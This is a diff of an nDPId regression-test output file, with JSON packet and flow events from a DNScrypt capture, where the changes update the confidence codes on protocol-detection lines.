02425{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":214,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":84,"flow_packet_id":1,"flow_last_seen":946739311802,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739311802,"pkt":"REREREREZmZmZmZmCABFAAXcgvMgAL0RdJ4KAAABNEHrgdhxAbsGBOwCCnIBAAABAAAAAAABATINZG5zY3J5cHQtY2VydApkZWZmZXItZG5zAmF1AAAQAAEAAAAAAAAAAAAFwgAMBb4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":214,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311802,"flow_last_seen":946739311802,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739311802,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"52.65.235.129","src_port":55409,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":214,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311802,"flow_last_seen":946739311802,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739311802,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"52.65.235.129","src_port":55409,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":215,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739311802} 
00420{"packet_event_id":1,"packet_event_name":"packet","packet_id":215,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739311802,"pkt":"REREREREZmZmZmZmCABFAABQgvMAub0RmXEKAAABNEHrgQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00709{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":216,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":79,"flow_packet_id":2,"flow_last_seen":946739312102,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":226,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":226,"pkt_l4_len":192,"thread_ts_msec":946739312102,"pkt":"ZmZmZmZmRERERERECABFAADUhiJAACkR6nc0QeuBCgAAAQG72hoAwNtICnOBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydApkZWZmZXItZG5zAmF1AAAQAAHADAAQAAEAAHCAAH18RE5TQwACAAAHR7dJhGoyFx8KdrkIsoh61C8rxtxAaFzxQo\/agVQzzjpZ5APiE6q3FOpAI96QjakMreCrdTAjP8EJbJX\/I6UH9uHXHTkXq4cOyA70iJwlafDxONoi+u6\/0zTNviG6FU724dcdORerhwAAAAFfU2DvX1Sybw=="} 
@@ -435,54 +435,54 @@ 00709{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":219,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":82,"flow_packet_id":2,"flow_last_seen":946739312105,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":226,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":226,"pkt_l4_len":192,"thread_ts_msec":946739312105,"pkt":"ZmZmZmZmRERERERECABFAADUhiVAACkR6nQ0QeuBCgAAAQG7ukUAwPsiCm6BgAABAAEAAAAAATINZG5zY3J5cHQtY2VydApkZWZmZXItZG5zAmF1AAAQAAHADAAQAAEAAHCAAH18RE5TQwACAAAHR7dJhGoyFx8KdrkIsoh61C8rxtxAaFzxQo\/agVQzzjpZ5APiE6q3FOpAI96QjakMreCrdTAjP8EJbJX\/I6UH9uHXHTkXq4cOyA70iJwlafDxONoi+u6\/0zTNviG6FU724dcdORerhwAAAAFfU2DvX1Sybw=="} 00603{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":220,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312105,"flow_last_seen":946739312105,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739312105,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":38812,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02425{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":220,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":85,"flow_packet_id":1,"flow_last_seen":946739312105,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739312105,"pkt":"REREREREZmZmZmZmCABFAAXcRfwgAL0RYAgKAAABMw8+QZecAbsGBGX0xUgBAAABAAAAAAABATINZG5zY3J5cHQtY2VydA5za3lmaWdodGVyLWRucwNjb20AABAAAQAAAAAAAAAAAAW9AAwFuQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":220,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312105,"flow_last_seen":946739312105,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739312105,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":38812,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":220,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312105,"flow_last_seen":946739312105,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739312105,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":38812,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
00709{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":221,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":84,"flow_packet_id":2,"flow_last_seen":946739312105,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":226,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":226,"pkt_l4_len":192,"thread_ts_msec":946739312105,"pkt":"ZmZmZmZmRERERERECABFAADUhiZAACkR6nM0QeuBCgAAAQG72HEAwNzyCnKBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydApkZWZmZXItZG5zAmF1AAAQAAHADAAQAAEAAHCAAH18RE5TQwACAAAHR7dJhGoyFx8KdrkIsoh61C8rxtxAaFzxQo\/agVQzzjpZ5APiE6q3FOpAI96QjakMreCrdTAjP8EJbJX\/I6UH9uHXHTkXq4cOyA70iJwlafDxONoi+u6\/0zTNviG6FU724dcdORerhwAAAAFfU2DvX1Sybw=="} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":222,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739312105} 00420{"packet_event_id":1,"packet_event_name":"packet","packet_id":222,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739312105,"pkt":"REREREREZmZmZmZmCABFAABQRfwAub0RhNsKAAABMw8+QQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":223,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312105,"flow_last_seen":946739312105,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739312105,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":45993,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
01142{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":223,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":86,"flow_packet_id":1,"flow_last_seen":946739312105,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739312105,"pkt":"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"} -00656{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":223,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312105,"flow_last_seen":946739312105,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739312105,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":45993,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00656{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":223,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312105,"flow_last_seen":946739312105,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739312105,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":45993,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
00603{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":224,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312105,"flow_last_seen":946739312105,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739312105,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":56688,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02425{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":224,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":87,"flow_packet_id":1,"flow_last_seen":946739312105,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739312105,"pkt":"REREREREZmZmZmZmCABFAAXcRf4gAL0RYAYKAAABMw8+Qd1wAbsGBCAixUYBAAABAAAAAAABATINZG5zY3J5cHQtY2VydA5za3lmaWdodGVyLWRucwNjb20AABAAAQAAAAAAAAAAAAW9AAwFuQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":224,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312105,"flow_last_seen":946739312105,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739312105,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":56688,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":224,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312105,"flow_last_seen":946739312105,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739312105,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":56688,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":225,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739312105} 00420{"packet_event_id":1,"packet_event_name":"packet","packet_id":225,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739312105,"pkt":"REREREREZmZmZmZmCABFAABQRf4Aub0RhNkKAAABMw8+QQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 
00709{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":226,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":83,"flow_packet_id":2,"flow_last_seen":946739312105,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":226,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":226,"pkt_l4_len":192,"thread_ts_msec":946739312105,"pkt":"ZmZmZmZmRERERERECABFAADUhidAACgR63I0QeuBCgAAAQG72qsAwNq7Cm+BgAABAAEAAAAAATINZG5zY3J5cHQtY2VydApkZWZmZXItZG5zAmF1AAAQAAHADAAQAAEAAHCAAH18RE5TQwACAAAHR7dJhGoyFx8KdrkIsoh61C8rxtxAaFzxQo\/agVQzzjpZ5APiE6q3FOpAI96QjakMreCrdTAjP8EJbJX\/I6UH9uHXHTkXq4cOyA70iJwlafDxONoi+u6\/0zTNviG6FU724dcdORerhwAAAAFfU2DvX1Sybw=="} 00603{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":227,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312105,"flow_last_seen":946739312105,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739312105,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":33521,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02425{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":227,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":88,"flow_packet_id":1,"flow_last_seen":946739312105,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739312105,"pkt":"REREREREZmZmZmZmCABFAAXcRf8gAL0RYAUKAAABMw8+QYLxAbsGBHqjxUQBAAABAAAAAAABATINZG5zY3J5cHQtY2VydA5za3lmaWdodGVyLWRucwNjb20AABAAAQAAAAAAAAAAAAW9AAwFuQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA